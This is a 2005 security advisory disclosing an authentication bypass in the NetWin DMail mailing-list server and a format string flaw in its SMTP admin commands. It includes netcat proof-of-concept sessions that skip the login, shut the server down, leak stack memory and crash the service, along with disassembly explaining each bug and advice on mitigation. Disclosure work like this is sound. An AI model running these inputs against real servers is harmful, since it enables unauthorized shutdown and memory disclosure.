 |
|
|
by Tan Chew Keong
Release Date: 03 May 2005
NetWin DMail
is an easy to install, high performance, reliable and scalable mail server. It can either be used as a small personal mail server or as a 10 Million user ISP mail system. Flexible authentication modules allow you to plug DMail into any existing user database. It includes many spam prevention mechanisms and the ability to run any of several virus checking packages of your choice.
An authentication bypass vulnerability was found in DMail's mailing list server (dlist.exe). This vulnerability may be
remotely exploited to view logs generated by the mailing list server (dlist.exe) or to shut it down. The second is a
format string vulnerability that exists in the admin commands of dsmtp.exe.
DMail Version 3.1a NT (dm31b_win32.exe) on English Win2K SP4.
The NetWin DMail server package consists of the SMTP server (dsmtp.exe), the POP server (dpop.exe), the mailing list server
(dlist.exe), and the GUI management tool (dmadmin.exe). The GUI management tool (dmadmin.exe) allows the administrator
to manage the three servers and to retrieve live logs from them. dmadmin.exe sends admin commands to each of these three
servers via their respective listening ports. dmadmin.exe must authenticate to these servers using an admin
password (or password hash) when sending the admin commands.
This advisory document two vulnerabilities found in NetWin DMail server. The first is an authentication
bypass vulnerability that was found in DMail's mailing list server (dlist.exe). This vulnerability may be remotely
exploited by an attacker to view logs generated by the mailing list server (dlist.exe) or to shut it down without
the need to know the admin password. The second is a format string vulnerability that exists in the admin commands
of dsmtp.exe.
1. dlist.exe Authentication Bypass Vulnerability.
DList is the mailing list server that is part of the DMail package. DList listens on port 7111 and accepts
admin commands from dmadmin.exe (the GUI management tool). These admin commands are issued by dmadmin.exe to
receive logs from the DList server and/or to shutdown the server.
When issuing an admin command, dmadmin.exe must authenticate to the DList server using a numeric hash of the admin password.
However, it is possible to bypass this authentication to issue sendlog or shutdown commands to the DList
server without knowing the password hash. A remote attacker may connect to the mailing list server on port 7111, bypass
its authentication, and shutdown it down, or receive logs from it.
The following illustrates this.
C:\> nc 192.168.2.104 7111
hash 10687
password 234343 // suppose we do not know the password hash
err Password wrong
shutdown 234343 // we're not authenticated so can't shutdown down the server
error NOT AUTHORIZED YET
shutdown 234343
error NOT AUTHORIZED YET
sendlog 234343 // sendlog command has a bug that will cause us to be authenticated as long as
// the atoi value of the hash we sent is not 0 and 1.
ok Dlist 3.1a, loglevel info, sending log to this channel
log 29 01:14:02 info: Process request on chan 3 - done
shutdown 234343 // now we can shutdown the server
log 29 01:14:14 info: Process request on chan 1
The problem lies in the _cmd_sendlog function as shown below. The code highlighted in red messes up
the computed hash and the use of JNZ means that the user is considered to be "authenticated" as long as the atoi value
of the supplied hash is not 0 and 1.
0041104F CALL dlist._tellnews_pass // Retrieve admin password
00411054 PUSH EAX
00411055 CALL dlist._lib_hash // Compute the hash of admin password
0041105A ADD ESP,8 // Hash in EAX
0041105D MOV ESI,EAX // Hash in ESI
0041105F NEG ESI
00411061 SBB ESI,ESI // ESI will be 0 or FFFFFFFF
00411063 INC ESI // ESI will be 1 or 0
00411064 MOV EDX,DWORD PTR SS:[EBP+C]
00411067 PUSH EDX // Pointer to user supplied hash
00411068 CALL dlist._atoi // Convert to integer
0041106D ADD ESP,4
00411070 CMP ESI,EAX // Compare ESI (1 or 0) with atoi value of user supplied hash
00411072 JNZ SHORT dlist.004110D5 // i.e. Authenticated if atoi(user_supplied_hash) != 0 and != 1
00411074 PUSH dlist.0043339C // Arg2 = 0043339C ASCII "err Password incorrect"
00411079 MOV EAX,DWORD PTR SS:[EBP+8]
0041107C MOV ECX,DWORD PTR DS:[EAX*4+459590]
00411083 PUSH ECX // Arg1
00411084 CALL dlist._tcp_printf // Reply "err Password incorrect" to user
...
...
...
004110D5 MOV EDX,DWORD PTR SS:[EBP+8]
004110D8 MOV DWORD PTR DS:[EDX*4+459634],1 // Set "Authenticated" to TRUE
004110E3 MOV EAX,DWORD PTR SS:[EBP+8]
004110E6 MOV DWORD PTR DS:[EAX*4+4595E0],1
004110F1 CALL dlist._log_getlvl
// Since output of _lib_hash is usually not 0, CF will be set by NEG ESI. Hence, "SBB ESI, ESI" will be FFFFFFFF, and
// INC ESI will give 0. i.e. user will be authenticated as long as atoi(user_supplied_hash) != 0.
2. dsmtp.exe Admin Commands Format String Vulnerability.
DSmtp is the SMTP server of the DMail package. DSmtp listens on port 25 for SMTP commands and can accept admin commands
from dmadmin.exe on the same port.
These admin commands allow dmadmin.exe to receive logs from the DSmtp server, shutdown the server, and/or to request specific
information from the server. Format string vulnerability exists in several admin commands as shown below. However,
this vulnerability may only be exploited if the admin password is known.
C:\> nc 192.168.2.104 25
220 xxxxxxx DSMTP ESMTP Mail Server
xtellmail 123456 %.8X%.8X // incorrect admin password
-ERR Invalid password, command rejected
xtellmail 123123 test // supply an invalid admin command with correct admin password (123123)
-ERR Unknown tellsmtp command (test)
xtellmail 123123 %.8X%.8X%.8X%.8X // supply a format string as the admin command
-ERR Unknown tellsmtp command (302F3932313020333A33343A20203835) // contents of stack printed
xtellmail 123123 %n%n%n%n%n // this will cause a crash
...CRASH.....
C:\> nc 192.168.2.104 25
220 xxxxxxx DSMTP ESMTP Mail Server
xtellmail 123123 encode test
+DATA encoding test gives dGVzdAAA
+OK Done
xtellmail 123123 encode %.8X%.8X%.8X%.8X
+DATA encoding 00000006001114440000000000000000 gives JS44WCUuOFglLjhYJS44WAAA
+OK Done
xtellmail 123123 encode %n%n%n%n
...CRASH.....
This vulnerability is due to the unsafe use of the _vsnprintf function in _xmsg(char *formatstr, ...) and
_tcp_printf(arg1, char *formatstr, ...). This is illustrated below.
_cmd_tellmail(arg1, arg2, arg3, arg4, arg5)
{
...
...
// unknown tellsmtp command
_xmsg("-ERR Unknown tellsmtp command (%s)", "%n%n%n%n");
...
}
_xmsg(char *formatstr, ...)
{
// formatStr is "-ERR Unknown tellsmpt command (%s)"
// arglist points to "%n%n%n%n"
_vsnprintf(buffer, count, formatstr, arglist);
// buffer is now "-ERR Unknown tellsmtp command (%n%n%n%n)"
_tcp_printf(arg, buffer);
}
_tcp_printf(arg1, char *formatstr, ...)
{
// formatStr is "-ERR Unknown tellsmtp command (%n%n%n%n)"
// arglist points to somewhere on stack
_vsnprintf(buffer, count, formatstr, arglist);
}
- Vendor has been informed of these vulnerabilities by email.
- Block port 7111 with your firewall.
- Set a strong admin password.
17 Mar 05 - Vulnerability Discovered.
30 Mar 05 - Initial Vendor Notification (no reply).
05 Apr 05 - Second Vendor Notification.
05 Apr 05 - Initial Vendor Reply.
06 Apr 05 - Second Vendor Reply (will be uploading new versions this week).
22 Apr 05 - Status Check (no reply).
01 May 05 - Status Check (no reply).
03 May 05 - Public Release.
For further questions and enquries, email them to the following.
Overall-in-charge: Tan Chew Keong
webmaster@security.org.sg
|
 |
